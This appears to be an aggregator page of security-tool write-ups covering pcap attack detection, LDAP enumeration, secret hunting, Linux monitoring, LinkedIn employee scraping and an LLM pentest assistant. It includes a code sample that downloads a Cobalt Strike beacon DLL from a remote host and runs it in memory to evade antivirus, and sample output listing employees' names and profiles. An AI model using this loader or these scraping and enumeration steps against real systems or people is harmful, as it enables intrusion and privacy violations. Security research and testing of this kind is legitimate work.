Network_Assessment - With Wireshark Or TCPdump, You Can Determine Whether There Is Harmful Activity On Your Network Traffic That You Have Recorded On The Network You Monitor

By: Zion3R


With Wireshark or tcpdump, you can record traffic on the network you monitor and then determine whether that recorded traffic contains harmful activity.

This Python script analyzes network traffic in a given .pcap file and attempts to detect the following suspicious network activities and attacks:

  1. DNS Tunneling
  2. SSH Tunneling
  3. TCP Session Hijacking
  4. SMB Attack
  5. SMTP or DNS Attack
  6. IPv6 Fragmentation Attack
  7. TCP RST Attack
  8. SYN Flood Attack
  9. UDP Flood Attack
  10. Slowloris Attack

The script also tries to detect packets containing suspicious keywords (e.g. "password", "login", "admin"). Detected suspicious activities and attacks are displayed to the user in the console.

The main functions are:

  • get_user_input(): Gets the path of the .pcap file from the user.
  • get_all_ip_addresses(capture): Returns a set containing all source and destination IP addresses.
  • detect_* functions: Used to detect specific attacks and suspicious activities.
  • main(): Performs the main operations of the script. First, it gets the path of the .pcap file from the user, and then analyzes the file to try to detect the specified attacks and suspicious activity.
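For illustration, here is a minimal sketch of what a helper like get_all_ip_addresses() and a simple detect_* heuristic (a SYN-flood counter) could look like. The use of pyshark, the flag handling, and the threshold are assumptions made for this example, not the script's actual implementation.

import pyshark
from collections import Counter

def get_all_ip_addresses(capture):
    # Collect every source and destination IPv4 address seen in the capture.
    addresses = set()
    for packet in capture:
        if hasattr(packet, "ip"):
            addresses.add(packet.ip.src)
            addresses.add(packet.ip.dst)
    return addresses

def detect_syn_flood(capture, threshold=100):
    # Count bare SYNs (SYN set, ACK clear) per destination; many half-open
    # attempts against a single host is a crude SYN-flood indicator.
    syn_counts = Counter()
    for packet in capture:
        if hasattr(packet, "tcp") and hasattr(packet, "ip") \
                and str(packet.tcp.flags_syn) in ("1", "True") \
                and str(packet.tcp.flags_ack) in ("0", "False"):
            syn_counts[packet.ip.dst] += 1
    return [ip for ip, count in syn_counts.items() if count > threshold]

capture = pyshark.FileCapture("/root/Desktop/TCP_RST_Attack.pcap")
print(get_all_ip_addresses(capture))
# detect_syn_flood() would be run against a fresh FileCapture in the same way.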

How to Install Script?

git clone https://github.com/alperenugurlu/Network_Assessment.git

pip3 install -r requirements.txt

How to Run the Script?

python3 Network_Compromise_Assessment.py

Please enter the path to the .pcap or .pcapng file: /root/Desktop/TCP_RST_Attack.pcap (Example)

Script Creator

Alperen Ugurlu

Social Media:

https://www.linkedin.com/in/alperen-ugurlu-7b57b7178/



Golddigger - Search Files For Gold

By: Zion3R


Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. Originally written to assist in rapidly searching files obtained during a penetration test.


Installation

Gold Digger requires Python3.

virtualenv -p python3 .
source bin/activate
python dig.py --help

Usage

usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]

optional arguments:
-h, --help show this help message and exit
-e EXCLUDE, --exclude EXCLUDE
JSON file containing extension exclusions
-g GOLD, --gold GOLD JSON file containing the gold to search for
-d DIRECTORY, --directory DIRECTORY
Directory to search for gold
-r RECURSIVE, --recursive RECURSIVE
Search directory recursively?
-l LOG, --log LOG Log file to save output

Example Usage

Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json file. Additionally, you can leverage an exclusion file called exclusions.json for skipping files matching specific extensions. Provide the root folder as the --directory flag.

An example structure could be:

~/Engagements/CustomerName/data/randomfiles/
~/Engagements/CustomerName/data/randomfiles2/
~/Engagements/CustomerName/data/code/

You would run the following command to parse all three folders:

python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log

Results

The tool will create a log file containing the scanning results. Due to the nature of using regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.
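Conceptually, the scan is a recursive walk that applies a set of regular expressions to each file, which is also why false positives are expected. The sketch below only illustrates that idea; the JSON layout, pattern names, and function name are assumptions for the example, not Gold Digger's actual code.

import json
import re
from pathlib import Path

def scan_for_gold(root, gold_file="gold.json", exclude_exts=(".png", ".jpg")):
    # gold.json is assumed here to map a label to a regex pattern string.
    patterns = {name: re.compile(rx)
                for name, rx in json.loads(Path(gold_file).read_text()).items()}
    for path in Path(root).expanduser().rglob("*"):
        if not path.is_file() or path.suffix.lower() in exclude_exts:
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        for name, pattern in patterns.items():
            for match in pattern.finditer(text):
                # Regex matching is noisy, so expect false positives here.
                print(f"{path}: {name}: {match.group(0)[:80]}")

scan_for_gold("~/Engagements/CustomerName/data/")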

Shout-outs

Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regex in GoldDigger was used from this amazing project.



msLDAPDump - LDAP Enumeration Tool

By: Zion3R


msLDAPDump simplifies LDAP enumeration in a domain environment by wrapping Python's ldap3 library in an easy-to-use interface. Like most of my tools, this one works best on Windows. On Unix, the tool currently will not resolve hostnames that are not accessible via eth0.


Binding Anonymously

Users can bind to LDAP anonymously through the tool and dump basic information about LDAP, including domain naming context, domain controller hostnames, and more.
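As a rough illustration of what an anonymous bind with ldap3 looks like, consider the sketch below; the domain controller name and the fields printed are assumptions for the example, not msLDAPDump's actual code.

from ldap3 import Server, Connection, ALL

# Anonymous bind: no credentials, just pull the server's advertised rootDSE info.
server = Server("dc01.corp.local", get_info=ALL)   # hypothetical domain controller
conn = Connection(server, auto_bind=True)

# The DSE info includes naming contexts, the DC's DNS hostname, and more.
print(server.info.naming_contexts)
print(server.info.other.get("dnsHostName"))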

Credentialed Bind

Users can bind to LDAP utilizing valid user account credentials or a valid NTLM hash. Using credentials will obtain the same information as the anonymous bind, and will additionally check for the following:
  • Subnet scan for systems with ports 389 and 636 open
  • Basic Domain Info (Current user permissions, domain SID, password policy, machine account quota)
  • Users
  • Groups
  • Kerberoastable Accounts
  • ASREPRoastable Accounts
  • Constrained Delegation
  • Unconstrained Delegation
  • Computer Accounts - will also attempt DNS lookups on the hostname to identify IP addresses
  • Identify Domain Controllers
  • Identify Servers
  • Identify Deprecated Operating Systems
  • Identify MSSQL Servers
  • Identify Exchange Servers
  • Group Policy Objects (GPO)
  • Passwords in User description fields

Each check outputs the raw contents to a text file, and an abbreviated, cleaner version of the results in the terminal environment. The results in the terminal are pulled from the individual text files.
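For example, the Kerberoastable Accounts check from the list above boils down to an LDAP search for user objects with a servicePrincipalName set. The ldap3 sketch below shows the general shape of such a query; the DC name, credentials, search base, and attribute selection are hypothetical, not msLDAPDump's actual implementation.

from ldap3 import Server, Connection, NTLM, ALL, SUBTREE

server = Server("dc01.corp.local", get_info=ALL)                 # hypothetical DC
conn = Connection(server, user="CORP\\lowpriv", password="Password1!",
                  authentication=NTLM, auto_bind=True)

# Users with an SPN (excluding krbtgt) are candidates for Kerberoasting.
conn.search(search_base="DC=corp,DC=local",
            search_filter="(&(objectClass=user)(servicePrincipalName=*)(!(cn=krbtgt)))",
            search_scope=SUBTREE,
            attributes=["sAMAccountName", "servicePrincipalName"])
for entry in conn.entries:
    print(entry.sAMAccountName, entry.servicePrincipalName)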

Future Improvements

  • Add support for LDAPS (LDAP Secure)
  • NTLM Authentication
  • Figure out why Unix only allows one adapter to make a call out to the LDAP server (removed resolution from Linux until resolved)
  • Add support for querying child domain information (currently does not respond nicely to querying child domain controllers)
  • Figure out how to link the name to the Description field dump at the end of the script
  • Implement command line options rather than inputs
  • Check for deprecated operating systems in the domain
Mandatory Disclaimer

Please keep in mind that this tool is meant for ethical hacking and penetration testing purposes only. I do not condone any behavior that would include testing targets that you do not currently have permission to test against.



LSMS - Linux Security And Monitoring Scripts

By: Zion3R

These are a collection of security and monitoring scripts you can use to monitor your Linux installation for security-related events or for an investigation. Each script works on its own and is independent of the other scripts. The scripts can be set up to either print out their results, send them to you via mail, or use AlertR as a notification channel.


Repository Structure

The scripts are located in the directory scripts/. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.

Each script has a configuration file in the scripts/config/ directory to configure it. If the configuration file was not found during the execution of the script, the script will fall back to default settings and print out the results. Hence, it is not necessary to provide a configuration file.

The scripts/lib/ directory contains code that is shared between different scripts.

Scripts using a monitor_ prefix hold a state and are only useful for monitoring purposes. A single run of them during an investigation will only show the current state of the Linux system, not the changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the --init argument.
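The monitor_ pattern is essentially "record a baseline, then alert on differences". The stripped-down sketch below illustrates that idea for a single file; the state-file location and the use of a plain hash are illustrative assumptions, not LSMS code.

import hashlib
import json
import sys
from pathlib import Path

STATE_FILE = Path("/var/lib/lsms_example/passwd.state")   # hypothetical state location
MONITORED = Path("/etc/passwd")

def current_state():
    return {"sha256": hashlib.sha256(MONITORED.read_bytes()).hexdigest()}

def main():
    state = current_state()
    if "--init" in sys.argv or not STATE_FILE.exists():
        # Establish the current (assumed benign) state as the baseline.
        STATE_FILE.parent.mkdir(parents=True, exist_ok=True)
        STATE_FILE.write_text(json.dumps(state))
        return
    baseline = json.loads(STATE_FILE.read_text())
    if baseline != state:
        print(f"ALERT: {MONITORED} changed since the baseline was taken")
        STATE_FILE.write_text(json.dumps(state))   # remember the new state

if __name__ == "__main__":
    main()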

Usage

Take a look at the header of the script you want to execute. It contains a short description of what the script is supposed to do and what requirements are needed (if any at all). If requirements are needed, install them before running the script.

The shared configuration file scripts/config/config.py contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the scripts/config/ directory. If no configuration file was found, a default setting is used and the results are printed out.

Finally, you can run all configured scripts by executing start_search.py (which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.

Monitoring

If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:

  1. Set up a notification channel that is supported by the scripts (currently printing out, mail, or AlertR).

  2. Configure the scripts that you want to run using the configuration files in the scripts/config/ directory.

  3. Execute start_search.py with the --init argument to initialize the scripts with the monitor_ prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.

  4. Set up a cron job as root user that executes start_search.py (e.g., 0 * * * * root /opt/LSMS/start_search.py to start the search hourly).

List of Scripts

  • Monitoring cron files: monitor_cron.py
  • Monitoring /etc/hosts file: monitor_hosts_file.py
  • Monitoring /etc/ld.so.preload file: monitor_ld_preload.py
  • Monitoring /etc/passwd file: monitor_passwd.py
  • Monitoring modules: monitor_modules.py
  • Monitoring SSH authorized_keys files: monitor_ssh_authorized_keys.py
  • Monitoring systemd unit files: monitor_systemd_units.py
  • Search executables in /dev/shm: search_dev_shm.py
  • Search fileless programs (memfd_create): search_memfd_create.py
  • Search hidden ELF files: search_hidden_exe.py
  • Search immutable files: search_immutable_files.py
  • Search kernel thread impersonations: search_non_kthreads.py
  • Search processes that were started by a now disconnected SSH session: search_ssh_leftover_processes.py
  • Search running deleted programs: search_deleted_exe.py
  • Test script to check if alerting works: test_alert.py
  • Verify integrity of installed .deb packages: verify_deb_packages.py


PythonMemoryModule - Pure-Python Implementation Of MemoryModule Technique To Load Dll And Unmanaged Exe Entirely From Memory

By: Zion3R


"Python memory module" AI generated pic - hotpot.ai


Pure-Python implementation of the MemoryModule technique to load a DLL or unmanaged EXE entirely from memory.

What is it

PythonMemoryModule is a Python ctypes port of the MemoryModule technique originally published by Joachim Bauch. It can load a DLL or unmanaged EXE from Python without requiring an external compiled library (pyd). It leverages pefile to parse the PE headers and ctypes to carry out the loading.

The tool was originally intended to be used as a Pyramid module to provide evasion against AV/EDR by loading dll/exe payloads into python.exe entirely from memory; however, other use cases are possible (IP protection, in-memory loading of pyds, spin-offs for other, stealthier techniques), so I decided to create a dedicated repo.


Why it can be useful

  1. It basically allows using the MemoryModule technique entirely from the interpreted Python language, enabling the loading of a dll from a memory buffer with the stock, signed python.exe binary, without dropping external code/libraries to disk (such as the pymemorymodule bindings) that could be flagged by AV/EDRs or raise the user's suspicion.
  2. Using the MemoryModule technique in compiled-language loaders would require embedding the MemoryModule code within the loaders themselves. This can be avoided by using the interpreted Python language and PythonMemoryModule, since the code can be executed dynamically and in memory.
  3. You can get some level of intellectual-property protection by dynamically downloading, decrypting and loading in memory dlls that should be hidden from prying eyes. Bear in mind that the dlls can still be recovered from memory and reverse-engineered, but at least it requires some more effort from the attacker.
  4. You can load a stageless payload dll without performing injection or shellcode execution. The loading process mimics the LoadLibrary Windows API (which takes a path on disk as input) without actually calling it, operating in memory instead.

How to use it

In the following example a Cobalt Strike stageless beacon dll is downloaded (not saved on disk), loaded in memory and started by calling the entrypoint.

import urllib.request
import ctypes
import pythonmemorymodule

# Download the stageless beacon dll into a memory buffer (nothing touches disk).
request = urllib.request.Request('http://192.168.1.2/beacon.dll')
result = urllib.request.urlopen(request)
buf = result.read()

# Map the dll into the current process directly from the buffer
# (debug=True prints the loader steps).
dll = pythonmemorymodule.MemoryModule(data=buf, debug=True)

# Resolve the exported StartW function and start the beacon.
startDll = dll.get_proc_addr('StartW')
assert startDll()
#dll.free_library()

Note: if you use staging in your malleable profile the dll would not be able to load with LoadLibrary, hence MemoryModule won't work.

How to detect it

The MemoryModule technique mostly respects the section permissions of the target DLL and avoids the noisy RWX approach. However, the process will contain committed private memory that is not backed by a DLL on disk, and this is a MemoryModule telltale.
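A rough way to hunt for that telltale is to walk a process's address space and flag executable regions of committed private (non-image-backed) memory. The ctypes sketch below only illustrates the idea; the structure layout is simplified for 64-bit Python on Windows and this is not a complete detection.

import ctypes
import ctypes.wintypes as wt

MEM_COMMIT, MEM_PRIVATE = 0x1000, 0x20000
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}          # PAGE_EXECUTE* protections
PROCESS_QUERY_INFORMATION = 0x0400

class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [("BaseAddress", ctypes.c_void_p),
                ("AllocationBase", ctypes.c_void_p),
                ("AllocationProtect", wt.DWORD),
                ("RegionSize", ctypes.c_size_t),
                ("State", wt.DWORD),
                ("Protect", wt.DWORD),
                ("Type", wt.DWORD)]

def private_executable_regions(pid):
    kernel32 = ctypes.windll.kernel32
    hproc = kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, pid)
    mbi, address, hits = MEMORY_BASIC_INFORMATION(), 0, []
    while kernel32.VirtualQueryEx(hproc, ctypes.c_void_p(address),
                                  ctypes.byref(mbi), ctypes.sizeof(mbi)):
        # Committed + MEM_PRIVATE + executable means code that is not backed by
        # any file on disk, which is what MemoryModule-style loading produces.
        if mbi.State == MEM_COMMIT and mbi.Type == MEM_PRIVATE and mbi.Protect in EXECUTABLE:
            hits.append((mbi.BaseAddress, mbi.RegionSize))
        address = (mbi.BaseAddress or 0) + mbi.RegionSize
    kernel32.CloseHandle(hproc)
    return hits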

Future improvements

  1. add support for argument parsing.
  2. add support (basic) for .NET assemblies execution.


LinkedInDumper - Tool To Dump Company Employees From LinkedIn API

By: Zion3R

Python 3 script to dump company employees from the LinkedIn API.

Description

LinkedInDumper is a Python 3 script that dumps employee data from the LinkedIn social networking platform.

The results contain firstname, lastname, position (title), location and a user's profile link. Only 2 API calls are required to retrieve all employees if the company does not have more than 10 employees. Otherwise, we have to paginate through the API results. With the --email-format CLI flag one can define a Python string format to auto generate email addresses based on the retrieved first and last name.


Requirements

LinkedInDumper talks to the unofficial LinkedIn Voyager API, which requires authentication. Therefore, you must have a valid LinkedIn user account. To keep it simple, LinkedInDumper just expects a cookie value provided by you. Because it works this way, even 2FA-protected accounts are supported. Furthermore, you must provide a LinkedIn company URL to dump employees from.

Retrieving LinkedIn Cookie

  1. Sign into www.linkedin.com and retrieve your li_at session cookie value e.g. via developer tools
  2. Specify the cookie value either persistently in the python script's variable li_at or temporarily during runtime via the CLI flag --cookie

Retrieving LinkedIn Company URL

  1. Search your target company on Google Search or directly on LinkedIn
  2. The LinkedIn company URL should look something like this: https://www.linkedin.com/company/apple

Usage

usage: linkedindumper.py [-h] --url <linkedin-url> [--cookie <cookie>] [--quiet] [--include-private-profiles] [--email-format EMAIL_FORMAT]

options:
-h, --help show this help message and exit
--url <linkedin-url> A LinkedIn company url - https://www.linkedin.com/company/<company>
--cookie <cookie> LinkedIn 'li_at' session cookie
--quiet Show employee results only
--include-private-profiles
Show private accounts too
--email-format Python string format for emails; for example:
[1] john.doe@example.com > '{0}.{1}@example.com'
[2] j.doe@example.com > '{0[0]}.{1}@example.com'
[3] jdoe@example.com > '{0[0]}{1}@example.com'
[4] doe@example.com > '{1}@example.com'
[5] john@example.com > '{0}@example.com'
[6] jd@example.com > '{0[0]}{1[0]}@example.com'
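The patterns above are plain Python str.format strings, where {0} is the first name and {1} the last name, and {0[0]} indexes the first character. A quick illustration with made-up names and a placeholder domain:

first, last = "john", "doe"

print("{0}.{1}@example.com".format(first, last))       # john.doe@example.com
print("{0[0]}.{1}@example.com".format(first, last))    # j.doe@example.com
print("{0[0]}{1[0]}@example.com".format(first, last))  # jd@example.com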

Example 1 - Docker Run

docker run --rm l4rm4nd/linkedindumper:latest --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

Example 2 - Native Python

# install dependencies
pip install -r requirements.txt

python3 linkedindumper.py --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

Outputs

The script will return employee data as semi-colon separated values (like CSV):

[LinkedInDumper ASCII art banner - by LRVT]

[i] Company Name: apple
[i] Company X-ID: 162479
[i] LN Employees: 1000 employees found
[i] Dumping Date: 17/10/2022 13:55:06
[i] Email Format: {0}.{1}@apple.de
Firstname;Lastname;Email;Position;Gender;Location;Profile
Katrin;Honauer;katrin.honauer@apple.com;Software Engineer at Apple;N/A;Heidelberg;https://www.linkedin.com/in/katrin-honauer
Raymond;Chen;raymond.chen@apple.com;Recruiting at Apple;N/A;Austin, Texas Metropolitan Area;https://www.linkedin.com/in/raytherecruiter

[i] Successfully crawled 2 unique apple employee(s). Hurray ^_-

Limitations

LinkedIn will allow only the first 1,000 search results to be returned when harvesting contact information. You may also need a LinkedIn premium account once you have reached the maximum number of profile-visit queries allowed for a freemium LinkedIn account.

Furthermore, not all employee profiles are public. The results vary depending on the LinkedIn account you use and whether or not you are connected with some employees of the company being crawled. Therefore, it is sometimes not possible to retrieve the firstname, lastname and profile URL of some employee accounts. The script will not display such profiles, as they contain default values such as "LinkedIn" as firstname and "Member" as lastname. If you want to include such private profiles, use the CLI flag --include-private-profiles. Although these accounts are private, we can still obtain the position (title) as well as the location; only the firstname, lastname and profile URL are hidden for private LinkedIn accounts.

Finally, LinkedIn users are free to name their profile however they like. An account name can therefore consist of various things such as salutations, abbreviations, emojis, middle names, etc. I tried my best to remove some of this nonsense, but it is not a complete solution to the general problem. Note that we are not using the official LinkedIn API; this script gathers information from the "unofficial" Voyager API.



PentestGPT - A GPT-empowered Penetration Testing Tool

By: Zion3R


A GPT-empowered penetration testing tool.

Common Questions

  • Q: What is PentestGPT?
    • A: PentestGPT is a penetration testing tool empowered by ChatGPT. It is designed to automate the penetration testing process. It is built on top of ChatGPT and operates in an interactive mode to guide penetration testers in both overall progress and specific operations.
  • Q: Do I need to be a ChatGPT Plus member to use PentestGPT?
    • A: Yes. PentestGPT relies on the GPT-4 model for high-quality reasoning. Since there is no public GPT-4 API yet, a wrapper is included that uses a ChatGPT session to support PentestGPT. You may also use the GPT-4 API directly if you have access to it.
  • Q: Why GPT-4?
    • A: After empirical evaluation, we found that GPT-4 performs better than GPT-3.5 in terms of penetration testing reasoning. In fact, GPT-3.5 leads to failed tests in simple tasks.
  • Q: Why not just use GPT-4 directly?
    • A: We found that GPT-4 suffers from loss of context as the test goes deeper. It is essential to maintain "test status awareness" in this process. You may check the PentestGPT design here for more details.
  • Q: What about AutoGPT?
    • A: AutoGPT is not designed for pentesting. It may perform malicious operations. Due to this consideration, we designed PentestGPT in an interactive mode. Of course, our end goal is an automated pentest solution.
  • Q: Future plan?
    • A: We're working on a paper to explore the tech details behind automated pentest. Meanwhile, please feel free to raise issues/discussions. I'll do my best to address all of them.

Getting Started

  • PentestGPT is a penetration testing tool empowered by ChatGPT.
  • It is designed to automate the penetration testing process. It is built on top of ChatGPT and operates in an interactive mode to guide penetration testers in both overall progress and specific operations.
  • PentestGPT is able to solve easy-to-medium HackTheBox machines and other CTF challenges. You can check this example in resources, where we use it to solve the HackTheBox challenge TEMPLATED (web challenge).
  • A sample testing process of PentestGPT on a target VulnHub machine (Hackable II) is available here.
  • A sample usage video is available here: Demo

Installation

Before installation, we recommend taking a look at this installation video if you want to use the cookie setup.

  1. Install requirements.txt with pip install -r requirements.txt
  2. Configure the cookies in config. You may follow a sample by cp config/chatgpt_config_sample.py config/chatgpt_config.py.
    • If you're using cookie, please watch this video: https://youtu.be/IbUcj0F9EBc. The general steps are:
      • Login to ChatGPT session page.
      • In Inspect - Network, find the connections to the ChatGPT session page.
      • Find the cookie in the request header of the request to https://chat.openai.com/api/auth/session and paste it into the cookie field of config/chatgpt_config.py. (In Inspect -> Network, find the session request and copy the cookie field from its request headers.)
      • Note that the other fields are temporarily deprecated due to the update of ChatGPT page.
      • Fill in userAgent with your user agent.
    • If you're using API:
      • Fill in the OpenAI API key in chatgpt_config.py.
  3. To verify that the connection is configured properly, you may run python3 test_connection.py. You should see some sample conversation with ChatGPT.
    • A sample output is below
    1. You're connected with ChatGPT Plus cookie. 
    To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4>
    ## Test connection for OpenAI api (GPT-4)
    2. You're connected with OpenAI API. You have GPT-4 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-4 --useAPI>
    ## Test connection for OpenAI api (GPT-3.5)
    3. You're connected with OpenAI API. You have GPT-3.5 access. To start PentestGPT, please use <python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI>
  4. (Notice) The above verification process is for the cookie setup. If you encounter errors after several tries, refresh the page, repeat the above steps, and try again. You may also try using the cookie with https://chat.openai.com/backend-api/conversations. Please submit an issue if you encounter any problem.
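For reference, the cookie-based setup in step 2 amounts to filling a couple of fields in config/chatgpt_config.py. The snippet below is only an illustrative sketch: the class layout and the openai_key field name are assumptions and may differ from the real sample file; only the cookie and userAgent fields are mentioned in the steps above.

# config/chatgpt_config.py -- illustrative sketch only, not the actual sample file
class ChatGPTConfig:
    # Value of the ChatGPT session cookie copied from the browser's request headers
    cookie = "__Secure-next-auth.session-token=<your-session-token>; ..."
    # Your browser's user agent string
    userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ..."
    # Only needed for the API mode (assumed field name)
    openai_key = "<your-openai-api-key>"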

Usage

  1. To start, run python3 main.py --args.
    • --reasoning_model is the reasoning model you want to use.
    • --useAPI is whether you want to use OpenAI API.
    • You're recommended to use the combination as suggested by test_connection.py, which are:
      • python3 main.py --reasoning_model=gpt-4
      • python3 main.py --reasoning_model=gpt-4 --useAPI
      • python3 main.py --reasoning_model=gpt-3.5-turbo --useAPI
  2. The tool works similarly to msfconsole. Follow the guidance to perform penetration testing.
  3. In general, PentestGPT intakes commands similar to chatGPT. There are several basic commands.
    1. The commands are:
      • help: show the help message.
      • next: key in the test execution result and get the next step.
      • more: let PentestGPT explain more details of the current step. Also, a new sub-task solver will be created to guide the tester.
      • todo: show the todo list.
      • discuss: discuss with the PentestGPT.
      • google: search on Google. This function is still under development.
      • quit: exit the tool and save the output as log file (see the reporting section below).
    2. You can use <SHIFT + right arrow> to end your input (ENTER inserts a new line).
    3. You may always use TAB to autocomplete the commands.
    4. When you're given a drop-down selection list, you can use the arrow keys to navigate the list and press ENTER to select an item. Similarly, use <SHIFT + right arrow> to confirm the selection.
  4. In the sub-task handler initiated by more, users can execute further commands to investigate a specific problem:
    1. The commands are:
      • help: show the help message.
      • brainstorm: let PentestGPT brainstorm on the local task for all the possible solutions.
      • discuss: discuss with PentestGPT about this local task.
      • google: search on Google. This function is still under development.
      • continue: exit the subtask and continue the main testing session.

Report and Logging

  1. After finishing the penetration test, a report will be automatically generated in the logs folder (if you quit with the quit command).
  2. The report can be printed in a human-readable format by running python3 utils/report_generator.py <log file>. A sample report sample_pentestGPT_log.txt is also uploaded.

Contributing

Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.

If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!

  1. Fork the Project
  2. Create your Feature Branch (git checkout -b feature/AmazingFeature)
  3. Commit your Changes (git commit -m 'Add some AmazingFeature')
  4. Push to the Branch (git push origin feature/AmazingFeature)
  5. Open a Pull Request

License

Distributed under the MIT License. See LICENSE.txt for more information.

Contact

Gelei Deng - gelei.deng@ntu.edu.sg



โŒ